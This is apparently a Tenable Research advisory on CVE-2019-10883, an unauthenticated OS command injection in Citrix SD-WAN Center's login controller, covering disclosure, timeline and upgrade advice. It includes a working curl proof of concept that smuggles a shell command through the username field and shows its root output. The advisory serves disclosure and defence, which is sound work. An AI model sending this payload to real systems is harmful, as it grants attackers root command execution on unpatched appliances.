Critical OS Command Injection Vulnerability in Citrix SD-WAN Center Discovered
Tenable Research has discovered a critical vulnerability in Citrix SD-WAN Center that could lead to remote code execution.
Hintergrund
On April 10, Citrix released a security bulletin for CVE-2019-10883, an operating system (OS) command injection vulnerability in Citrix SD-WAN Center 10.2.x before 10.2.1 and NetScaler SD-WAN Center 10.0.x before 10.0.7. Tenable Research discovered this vulnerability while developing a plugin for CVE-2017-6316 and reported it to Citrix.
Citrix Netscaler SD-WAN (software defined wide-area network) allows enterprises to manage their networks and create a virtual WAN. These types of products are used to support branch offices and remote data centers, and to maintain connectivity for cloud-based applications. According to the Citrix website, Netscaler SD-WAN is used in several industries like shipping, non-profit, hospitality and others.
Analyse
While reviewing CTX236992, Tenable Research observed that most of the vulnerabilities in this security bulletin required authentication. For the purpose of writing an uncredentialed Nessus plugin, we ended up looking at two unauthenticated command injection vulnerabilities mentioned in the writeup by the researchers who were credited in CTX236992. These vulnerabilities appeared to be linked to CVE-2017-6316, a vulnerability in the Citrix SD-WAN appliance.
Through our research of CVE-2017-6316, we discovered the Citrix SD-WAN Center 10.2.0.136.733315 was vulnerable to insufficient validation of user-supplied data ($username) in the controller located at /home/talariuser/www/app/Controller/UsersController.php (CVE-2019-10883).
Proof-of-Concept
An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary commands with root privileges. This could be achieved by running the following cURL command:
curl -skv --tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login'
The output from running this command:
root@VWC:/home/talariuser/www/app/Controller# cat /tmp/test
uid=0(root) gid=0(root) groups=0(root)
Reaktion des Anbieters
Tenable Research contacted Citrix in early February and confirmed they reproduced the vulnerability by the end of February. Citrix published its security bulletin for this vulnerability on April 10.
Lösung
Users should upgrade to Citrix SD-WAN Center 10.2.1 or later and NetScaler SD-WAN Center 10.0.7 or later. Additionally, Citrix provided a list of best practices that should be used to harden the security of the SD-WAN Center.
Weitere Informationen
Erfahren Sie mehr über Tenable, die erste Cyber Exposure-Plattform für die ganzheitliche Verwaltung Ihrer modernen Angriffsoberfläche.
Get a free 60-day trial of Tenable.io Vulnerability Management.
Verwandte Artikel
Cybersecurity Snapshot: Find MITRE ATT&CK Complex? Need Help Mapping to It? There’s an App for That!
March 10, 2023Learn about a new tool that streamlines MITRE ATT&CK mapping. Plus, known vulnerabilities remain a major cyber risk – just ask LastPass. Also, discover why SaaS data protection remains difficult. Plus, a look at the U.S. National Cybersecurity Strategy. And much more!
The Ransomware Ecosystem: In Pursuit of Fame and Fortune
July 28, 2022The key players within the ransomware ecosystem, including affiliates and initial access brokers, work together cohesively like a band of musicians, playing their respective parts as they strive for fame and fortune.
Brazen, Unsophisticated and Illogical: Understanding the LAPSUS$ Extortion Group
July 20, 2022Having gained the industry’s attention in the first months of 2022, the LAPSUS$ extortion group has largely gone quiet. What can we learn from this extortion group’s story and tactics?
Microsoft’s May 2024 Patch Tuesday Addresses 59 CVEs (CVE-2024-30051, CVE-2024-30040)
May 14, 2024Microsoft addresses 59 CVEs in its May 2024 Patch Tuesday release with one critical vulnerability and three zero-day vulnerabilities, two of which were exploited in the wild.
Tenable Cloud Security Study Reveals a Whopping 95% of Surveyed Organizations Suffered a Cloud-Related Breach Over an 18-Month Period
May 14, 2024The finding from the Tenable 2024 Cloud Security Outlook study is a clear sign of the need for proactive and robust cloud security. Read on to learn more about the study’s findings, including the main challenges cloud security teams face, their strategies for better protecting their cloud infrastructure and the tools they use to measure success.
Shifting the Paradigm: Why the Cyber Insurance Industry Should Focus on Preventive Security
May 13, 2024As claims and losses climb, it’s clear that preventive security should be prioritized more when designing a cyber insurance policy. Here’s why preventive security investments are cost effective and can lead to lower premiums.
- Threat Intelligence
- Threat Management
- Vulnerability Management
- Vulnerability Scanning